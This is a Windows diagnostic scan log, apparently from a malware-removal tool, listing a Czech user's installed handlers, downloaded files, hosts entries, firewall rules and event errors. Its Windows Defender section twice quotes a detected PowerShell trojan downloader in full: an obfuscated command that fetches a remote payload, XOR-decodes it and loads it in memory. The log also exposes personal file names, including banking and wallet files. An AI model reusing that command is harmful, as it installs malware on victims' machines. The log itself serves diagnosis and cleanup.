ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/20/2021 08:00:00 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============
Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 05:12:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Adobe Acrobat Update Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


Windows Defender:
===================================
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
